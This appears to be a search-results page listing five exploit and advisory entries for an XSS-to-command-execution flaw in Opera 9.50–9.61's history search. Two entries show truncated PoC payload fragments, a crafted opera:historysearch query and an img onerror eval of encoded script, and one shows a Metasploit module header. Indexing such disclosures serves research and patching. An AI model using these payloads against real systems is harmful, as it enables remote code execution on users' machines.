5 matches found
Opera historysearch XSS
Certain constructs are not escaped correctly by Opera's History Search results. These can be used to inject scripts into the page, which can then be used to modify configuration settings and execute arbitrary commands. Affects Opera versions between 9.50 and 9.61. This module requires Metasploit:...
Opera 9.61 opera:historysearch Code Execution Exploit PoC
Exploit for unknown platform in category remote exploits ========================================================= Opera 9.61 opera:historysearch Code Execution Exploit PoC ========================================================= function x window.open'opera:historysearch?q=%2A"&p=1&s=1';...
Opera 9.61 - opera:historysearch Code Execution
Opera 9.61 - opera:historysearch Code Execution function x window.open'opera:historysearch?q=%2A"&p=1&s=1'; window.setTimeout"location.href='mailto:'",4000; Click me... img src='x' onerror='evalString.fromCharCode113,61,100,11...
Opera crossite scripting
Crossite scripting with opera:historysearch...
Opera 9.50/9.61 historysearch - Command Execution (Metasploit)
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/projects/Framework/ require 'msf/core' class Metasploit3...